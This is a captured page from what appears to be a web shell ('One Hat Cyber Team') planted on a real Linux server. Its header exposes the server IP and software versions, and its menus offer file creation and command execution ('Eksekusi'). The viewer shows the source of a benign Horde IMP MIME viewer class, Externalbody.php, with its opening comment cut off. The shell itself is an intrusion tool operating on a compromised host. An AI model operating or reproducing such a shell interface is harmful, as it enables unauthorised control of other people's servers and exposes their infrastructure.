⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
imp
/
lib
/
Mime
/
Viewer
/
View File Name :
Externalbody.php
* @category Horde * @copyright 2011-2017 Horde LLC * @license http://www.horde.org/licenses/gpl GPL * @package IMP */ class IMP_Mime_Viewer_Externalbody extends Horde_Mime_Viewer_Base { /** */ protected $_metadata = array( 'compressed' => false, 'embedded' => true, 'forceinline' => true ); /** */ protected function _getEmbeddedMimeParts() { switch ($this->_mimepart->getContentTypeParameter('access-type')) { case 'anon-ftp': case 'ftp': case 'local-file': case 'mail-server': case 'tftp': // RFC 2046 [5.2.3.1]: Unsupported. break; case 'content-id': // RFC 1873 $imp_contents = $this->getConfigParam('imp_contents'); $base_part = $imp_contents->getMIMEMessage(); $cid = $this->_mimepart->getContentId(); foreach (array_keys($base_part->contentTypeMap(true)) as $key) { if (($part = $base_part->getPart($key)) && ($part->getContentId() == $cid) && ($part->getType() != 'message/external-body')) { $full_part = clone $imp_contents->getMIMEPart($key); $full_part->setMimeId($this->_mimepart->getMimeId()); // TODO: Add headers from referring body part. return $full_part; } } break; } return null; } }